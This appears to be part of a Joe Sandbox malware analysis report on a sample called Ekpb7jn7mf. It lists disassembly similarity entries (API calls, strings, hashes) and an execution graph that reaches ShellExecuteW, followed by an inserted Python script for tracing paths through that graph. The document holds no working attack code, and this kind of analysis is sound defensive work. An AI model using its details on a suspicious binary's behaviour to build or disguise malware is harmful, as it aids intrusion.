                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3013590873-0
                                                                                  • Opcode ID: 93ce2218eb711f8a3a1566bc0119a61f5b46c0e5ed04685ce2a0b30a240ba023
                                                                                  • Instruction ID: e61058f2c924f18cf44b3716d7199eba2e33b25c3138a383d844bd036fe00bab
                                                                                  • Opcode Fuzzy Hash: 93ce2218eb711f8a3a1566bc0119a61f5b46c0e5ed04685ce2a0b30a240ba023
                                                                                  • Instruction Fuzzy Hash: 170184B1740740BAD221E716CC47FDBB6A8DFC9B18F00081FB259761C2C7BC565086AD
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                  • Instruction ID: ad02efd122ed2333f7502648e5777f30876e1af65ebdecf52b8212f03a33dcef
                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                  • Instruction Fuzzy Hash: F711807220005EBBCF125E85ED41CEE3F37BB18355F998416FE1859131C67ACAB2AB85
                                                                                  APIs
                                                                                    • Part of subcall function 0040C271: LoadStringW.USER32(?,-004325D2,00000200), ref: 0040C2C2
                                                                                    • Part of subcall function 0040C271: LoadStringW.USER32(?,-004325D2,00000200), ref: 0040C2D4
                                                                                  • _swprintf.LIBCMT ref: 00411829
                                                                                    • Part of subcall function 00401B74: __vswprintf_c_l.LIBCMT ref: 00401B87
                                                                                  • GetLastError.KERNEL32(?), ref: 00411831
                                                                                  • MessageBoxW.USER32(?,00000000,00000096,00000035), ref: 00411853
                                                                                  • SetLastError.KERNEL32(00000000), ref: 00411860
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastLoadString$Message__vswprintf_c_l_swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2205000856-0
                                                                                  • Opcode ID: 90b3bf13175ec4f3bd797cc2b11990bc0bd06b311f4a533a60cf7db86b898d9c
                                                                                  • Instruction ID: ed8c194fd9dce5b65a4ab69c32904f4180831e7d0cf7aed1620b8a00417be88f
                                                                                  • Opcode Fuzzy Hash: 90b3bf13175ec4f3bd797cc2b11990bc0bd06b311f4a533a60cf7db86b898d9c
                                                                                  • Instruction Fuzzy Hash: 93F0F632540218BBFB1137A08C4AFCE375CAF16385F0042A7F505F50E2E5799875876D
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 004220CF
                                                                                    • Part of subcall function 0041E764: __getptd_noexit.LIBCMT ref: 0041E767
                                                                                    • Part of subcall function 0041E764: __amsg_exit.LIBCMT ref: 0041E774
                                                                                  • __getptd.LIBCMT ref: 004220E6
                                                                                  • __amsg_exit.LIBCMT ref: 004220F4
                                                                                  • __lock.LIBCMT ref: 00422104
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 3521780317-0
                                                                                  • Opcode ID: 9bbfce21fc56b317f6a36a82937c31e252a0bf44d043ae3dcf04175c47f93af7
                                                                                  • Instruction ID: ba531cc4217b4df794b256f33fc1b133dbd71ccaad3f842f0c6843564655d570
                                                                                  • Opcode Fuzzy Hash: 9bbfce21fc56b317f6a36a82937c31e252a0bf44d043ae3dcf04175c47f93af7
                                                                                  • Instruction Fuzzy Hash: A0F06235B00720DBD720FB66A502B9972A16F04718F90416FB951972E1CFBC5981CA5E
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _swprintf
                                                                                  • String ID: ;%u
                                                                                  • API String ID: 589789837-535004727
                                                                                  • Opcode ID: 041691639bbd541154391281e3a4aaa2f273f69e637fbf8d4a6aa86dd2ac6dcb
                                                                                  • Instruction ID: a0edadda82c9f23437f4239ca8a730b7792abe68c1af6789e4c56d0fcaebc8ca
                                                                                  • Opcode Fuzzy Hash: 041691639bbd541154391281e3a4aaa2f273f69e637fbf8d4a6aa86dd2ac6dcb
                                                                                  • Instruction Fuzzy Hash: C1D113702007449ADB24EF358689BEE77E5AF40304F04053FE956A72D2DBBCA985CB59
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: __rar_
                                                                                  • API String ID: 176396367-2561138058
                                                                                  • Opcode ID: a65a0ca25c52315b287b4020813a743e18ca25b1074e3f498088ae359453fe39
                                                                                  • Instruction ID: 7a58e1af0f96e59094e416f3dae6167a4554a84c47e3b8dc4b5b1a955f67997f
                                                                                  • Opcode Fuzzy Hash: a65a0ca25c52315b287b4020813a743e18ca25b1074e3f498088ae359453fe39
                                                                                  • Instruction Fuzzy Hash: 4841D032A00259A6CF21AE65CC81BEF736EAF54354F04047BF809B31D3D63CDE9196A9
                                                                                  APIs
                                                                                    • Part of subcall function 0040CD68: LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CDC0,00000020,?,?,00405D34,?,00000020,00000001,00000000,?,00000010,?,?,?), ref: 0040CD76
                                                                                    • Part of subcall function 0040CD68: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CD8F
                                                                                    • Part of subcall function 0040CD68: GetProcAddress.KERNEL32(00437800,CryptUnprotectMemory), ref: 0040CD9B
                                                                                  • GetCurrentProcessId.KERNEL32(00000020,?,?,00405D34,?,00000020,00000001,00000000,?,00000010,?,?,?,00000001,?,?), ref: 0040CE2E
                                                                                  Strings
                                                                                  • CryptProtectMemory failed, xrefs: 0040CDEE
                                                                                  • CryptUnprotectMemory failed, xrefs: 0040CE27
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CurrentLibraryLoadProcess
                                                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                  • API String ID: 137661620-396321323
                                                                                  • Opcode ID: 198082f2dc4cbed04473a6d5c14103d9a5a2a777f495e332cbfda24714750072
                                                                                  • Instruction ID: 77e1c3413466269c5384ec847ceb783b2336dfca7173b6c82ec737576e481cfa
                                                                                  • Opcode Fuzzy Hash: 198082f2dc4cbed04473a6d5c14103d9a5a2a777f495e332cbfda24714750072
                                                                                  • Instruction Fuzzy Hash: 05110171304115ABDB1A6F64DCD167F3756DB81B10704413FF942AB2C1CA389C9593DD
                                                                                  APIs
                                                                                  • CreateThread.KERNEL32(00000000,00010000,00410F67,?,00000000,?), ref: 00410FE9
                                                                                  • SetThreadPriority.KERNEL32(?,00000000,?,?,00411055,-00000108,00404FD8), ref: 00411030
                                                                                    • Part of subcall function 004063AD: __vswprintf_c_l.LIBCMT ref: 004063CB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                  • String ID: CreateThread failed
                                                                                  • API String ID: 2655393344-3849766595
                                                                                  • Opcode ID: b8bbcb8923d232472ca76fefd6a4bf110d33c80091c186ad9e7ddcbf006ae7bd
                                                                                  • Instruction ID: 5542f57637ba82aa3817d501c1c8d39191179df7af46df1e3764541aa438c75b
                                                                                  • Opcode Fuzzy Hash: b8bbcb8923d232472ca76fefd6a4bf110d33c80091c186ad9e7ddcbf006ae7bd
                                                                                  • Instruction Fuzzy Hash: 4B012671344305BBD3306F55AD46BB23758EB48766F30003FFA82A2581DAF868D18B6D
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcschr_wcspbrk
                                                                                  • String ID: ?*<>|"
                                                                                  • API String ID: 3305141221-226352099
                                                                                  • Opcode ID: 42140c1be0f08571e08a998b25392a297171eed4dcfc96837f1922278b3e00da
                                                                                  • Instruction ID: aa4710ce59c085ced9854f33b6b4169768e0b9bb7120ffb3a45601e14b6e1647
                                                                                  • Opcode Fuzzy Hash: 42140c1be0f08571e08a998b25392a297171eed4dcfc96837f1922278b3e00da
                                                                                  • Instruction Fuzzy Hash: A7F0492511432750DE382E1448056B332D88B11344B60843FE8C1B72C2E77E98EBD12F
                                                                                  APIs
                                                                                    • Part of subcall function 0041A19E: __getptd.LIBCMT ref: 0041A1A4
                                                                                    • Part of subcall function 0041A19E: __getptd.LIBCMT ref: 0041A1B4
                                                                                  • __getptd.LIBCMT ref: 0041DC6A
                                                                                    • Part of subcall function 0041E764: __getptd_noexit.LIBCMT ref: 0041E767
                                                                                    • Part of subcall function 0041E764: __amsg_exit.LIBCMT ref: 0041E774
                                                                                  • __getptd.LIBCMT ref: 0041DC78
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                  • String ID: csm
                                                                                  • API String ID: 803148776-1018135373
                                                                                  • Opcode ID: e2cc627116b19fb5553d78aab43f447c3cb7cefb71fdbbd70e56117400c6818a
                                                                                  • Instruction ID: 4df0fc6275fc01049fe42caa67c000990fab24198ade6d76edb3c47b82caba46
                                                                                  • Opcode Fuzzy Hash: e2cc627116b19fb5553d78aab43f447c3cb7cefb71fdbbd70e56117400c6818a
                                                                                  • Instruction Fuzzy Hash: 22017CB8C00704CADF24AF29D9406EEB3B5AF10314F14481FE44196791EB7899D0EBC9
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00410E3A,?), ref: 00410C72
                                                                                  • GetLastError.KERNEL32(?), ref: 00410C7E
                                                                                    • Part of subcall function 004063AD: __vswprintf_c_l.LIBCMT ref: 004063CB
                                                                                  Strings
                                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00410C87
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                  • API String ID: 1091760877-2248577382
                                                                                  • Opcode ID: cb8434b4d930f5674dfcd613430442c7000946ec074501a1036af1a50a433364
                                                                                  • Instruction ID: bf88496ac570465f9c3604917b5d80b7473bfed2f73079c342170331bd85cf75
                                                                                  • Opcode Fuzzy Hash: cb8434b4d930f5674dfcd613430442c7000946ec074501a1036af1a50a433364
                                                                                  • Instruction Fuzzy Hash: 2BD02E32608020BBDB013B28AC0AD9E34018F01334FB14722F935722F2DB7D0AB246EE

                                                                                  Execution Graph

                                                                                  Execution Coverage:23.4%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:50
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph (rendered as a diagram on the original page; one node per line as "id address [APIs] -> successors")
                                                                                  161 7ff630ce1570 __wgetmainargs
                                                                                  162 7ff630ce15c0 GetStartupInfoW -> 163
                                                                                  163 7ff630ce15ff -> 164, 165
                                                                                  164 7ff630ce1611 -> 166, 167
                                                                                  165 7ff630ce161a Sleep -> 163
                                                                                  166 7ff630ce1636 _amsg_exit -> 167
                                                                                  167 7ff630ce1644 -> 168, 169, 170
                                                                                  168 7ff630ce16ba _initterm -> 170
                                                                                  169 7ff630ce169b
                                                                                  170 7ff630ce16d7 _IsNonwritableInCurrentImage -> 169, 176
                                                                                  173 7ff630ce17a0 -> 169, 175
                                                                                  174 7ff630ce1798 exit -> 173
                                                                                  175 7ff630ce17a9 _cexit -> 169
                                                                                  176 7ff630ce109c EventRegister -> 177, 178
                                                                                  177 7ff630ce1111 -> 179, 181
                                                                                  178 7ff630ce10f6 EventSetInformation -> 177
                                                                                  179 7ff630ce11e8 ShellExecuteW -> 183
                                                                                  181 7ff630ce114c EventWriteTransfer -> 179
                                                                                  182 7ff630ce1218 -> 173, 174
                                                                                  183 7ff630ce1240 -> 184
                                                                                  184 7ff630ce1249 -> 185, 186
                                                                                  185 7ff630ce1254 -> 182
                                                                                  186 7ff630ce1340 RtlCaptureContext RtlLookupFunctionEntry -> 187, 188
                                                                                  187 7ff630ce1385 RtlVirtualUnwind -> 189
                                                                                  188 7ff630ce13c7 -> 189
                                                                                  189 7ff630ce13e9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess -> 182
                                                                                  190 7ff630ce1490 -> 192
                                                                                  192 7ff630ce14a2 -> 197
                                                                                  193 7ff630ce1509 __set_app_type -> 194
                                                                                  194 7ff630ce1546 -> 195, 196
                                                                                  195 7ff630ce154f __setusermatherr -> 196
                                                                                  196 7ff630ce155c
                                                                                  197 7ff630ce1918 GetModuleHandleW -> 198
                                                                                  198 7ff630ce192d -> 193
                                                                                  199 7ff630ce1890 SetUnhandledExceptionFilter
                                                                                  200 7ff630ce1850 -> 201, 202
                                                                                  201 7ff630ce1882
                                                                                  202 7ff630ce185f -> 201, 203
                                                                                  203 7ff630ce187b ?terminate@ -> 201
                                                                                  204 7ff630ce1830 -> 207
                                                                                  207 7ff630ce1264 -> 208, 209
                                                                                  208 7ff630ce128d -> 209, 210
                                                                                  209 7ff630ce1296 6 API calls -> 210
                                                                                  210 7ff630ce131b
                                                                                  211 7ff630ce1b40 _XcptFilter
                                                                                  212 7ff630ce17d9 -> 213, 214
                                                                                  213 7ff630ce17f1 -> 215, 216
                                                                                  214 7ff630ce17e8 _exit -> 213
                                                                                  215 7ff630ce17fa _cexit -> 216
                                                                                  216 7ff630ce1806
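The execution graph is exported as one flat line of tokens (node definitions "id address [API names]" and edges "a->b"). The following Python script is an added example and is not part of the Joe Sandbox report or of its IDA plugin: it tokenizes that line back into an adjacency list and answers the question an analyst actually has when reading it, namely which API calls lie on the path from the entry node (162, GetStartupInfoW) to a given API, here ShellExecuteW. The graph string is copied verbatim from the execution_graph line above; the tokenizer also tolerates the control_flow_graph form of the same export (address ranges and "call <addr>" labels), which is an assumption based only on the text on this page.

```python
"""Rebuild a Joe Sandbox execution_graph / control_flow_graph text export into
an adjacency list and trace API calls along a path.

Token grammar (inferred from the report text on this page):
  "<id> <addr>"      opens a node (id decimal, addr hex or hex-hex range)
  "<a>-><b>"         directed edge between node ids
  anything else      label (API name, "call <addr>", "6 API calls") attached
                     to the most recently opened node
"""
import re
from collections import deque

# execution_graph line of this report, copied verbatim from the text export.
EXECUTION_GRAPH = (
    "161 7ff630ce1570 __wgetmainargs 162 7ff630ce15c0 GetStartupInfoW 163 7ff630ce15ff 162->163 "
    "164 7ff630ce1611 163->164 165 7ff630ce161a Sleep 163->165 166 7ff630ce1636 _amsg_exit 164->166 "
    "167 7ff630ce1644 164->167 165->163 166->167 168 7ff630ce16ba _initterm 167->168 169 7ff630ce169b "
    "167->169 170 7ff630ce16d7 _IsNonwritableInCurrentImage 167->170 168->170 170->169 "
    "176 7ff630ce109c EventRegister 170->176 173 7ff630ce17a0 173->169 175 7ff630ce17a9 _cexit 173->175 "
    "174 7ff630ce1798 exit 174->173 175->169 177 7ff630ce1111 176->177 178 7ff630ce10f6 EventSetInformation "
    "176->178 179 7ff630ce11e8 ShellExecuteW 177->179 181 7ff630ce114c EventWriteTransfer 177->181 178->177 "
    "183 7ff630ce1240 179->183 181->179 182 7ff630ce1218 182->173 182->174 184 7ff630ce1249 183->184 "
    "185 7ff630ce1254 184->185 186 7ff630ce1340 RtlCaptureContext RtlLookupFunctionEntry 184->186 185->182 "
    "187 7ff630ce1385 RtlVirtualUnwind 186->187 188 7ff630ce13c7 186->188 189 7ff630ce13e9 "
    "SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 187->189 "
    "188->189 189->182 190 7ff630ce1490 192 7ff630ce14a2 190->192 197 7ff630ce1918 GetModuleHandleW "
    "192->197 193 7ff630ce1509 __set_app_type 194 7ff630ce1546 193->194 195 7ff630ce154f __setusermatherr "
    "194->195 196 7ff630ce155c 194->196 195->196 198 7ff630ce192d 197->198 198->193 "
    "199 7ff630ce1890 SetUnhandledExceptionFilter 200 7ff630ce1850 201 7ff630ce1882 200->201 "
    "202 7ff630ce185f 200->202 202->201 203 7ff630ce187b ?terminate@ 202->203 203->201 204 7ff630ce1830 "
    "207 7ff630ce1264 204->207 208 7ff630ce128d 207->208 209 7ff630ce1296 6 API calls 207->209 208->209 "
    "210 7ff630ce131b 208->210 209->210 211 7ff630ce1b40 _XcptFilter 212 7ff630ce17d9 213 7ff630ce17f1 "
    "212->213 214 7ff630ce17e8 _exit 212->214 215 7ff630ce17fa _cexit 213->215 216 7ff630ce1806 213->216 "
    "214->213 215->216"
)

_ADDR = re.compile(r"^[0-9a-f]{8,16}(-[0-9a-f]{8,16})?$")  # "7ff630ce15c0" or "a-b" block range
_EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_graph(text):
    """Return (nodes, edges): nodes[id] = {"addr", "labels"}, edges[id] = [successors]."""
    tokens = text.split()
    nodes, edges, current = {}, {}, None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        m = _EDGE.match(tok)
        if m:                                   # "a->b": edge, in report order
            edges.setdefault(int(m.group(1)), []).append(int(m.group(2)))
            i += 1
        elif tok.isdigit() and _ADDR.match(nxt):  # "<id> <addr>": new node
            current = int(tok)
            nodes[current] = {"addr": nxt, "labels": []}
            i += 2
        else:                                   # label for the current node ("6" in "6 API calls" lands here)
            if current is None:
                raise ValueError("label before any node: %r" % tok)
            nodes[current]["labels"].append(tok)
            i += 1
    return nodes, edges


def shortest_path(edges, start, goal):
    """BFS over directed edges, successors visited in report order; None if unreachable."""
    prev, queue = {start: None}, deque([start])
    while queue:
        n = queue.popleft()
        if n == goal:
            path = []
            while n is not None:
                path.append(n)
                n = prev[n]
            return path[::-1]
        for s in edges.get(n, []):
            if s not in prev:
                prev[s] = n
                queue.append(s)
    return None


def path_to_api(text, start, api):
    """(node path, API names met along it) from start to the first reachable node calling api."""
    nodes, edges = parse_graph(text)
    for target in (n for n, d in nodes.items() if api in d["labels"]):
        path = shortest_path(edges, start, target)
        if path is not None:
            return path, [lbl for n in path for lbl in nodes[n]["labels"]]
    return None, []


if __name__ == "__main__":
    nodes, edges = parse_graph(EXECUTION_GRAPH)
    print("nodes:", len(nodes), "edges:", sum(len(v) for v in edges.values()))
    path, trail = path_to_api(EXECUTION_GRAPH, 162, "ShellExecuteW")
    print(" -> ".join(map(str, path)))
    print(" -> ".join(trail))
```

Running it on the graph above recovers the 50 nodes the report counts and prints the entry-to-ShellExecuteW chain GetStartupInfoW -> _IsNonwritableInCurrentImage -> EventRegister -> ShellExecuteW; nodes such as GetModuleHandleW sit in a separate component and are reported as unreachable from 162, which is the check worth making before reading a graph as one linear execution trace.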

                                                                                  Callgraph

                                                                                  Control-flow Graph

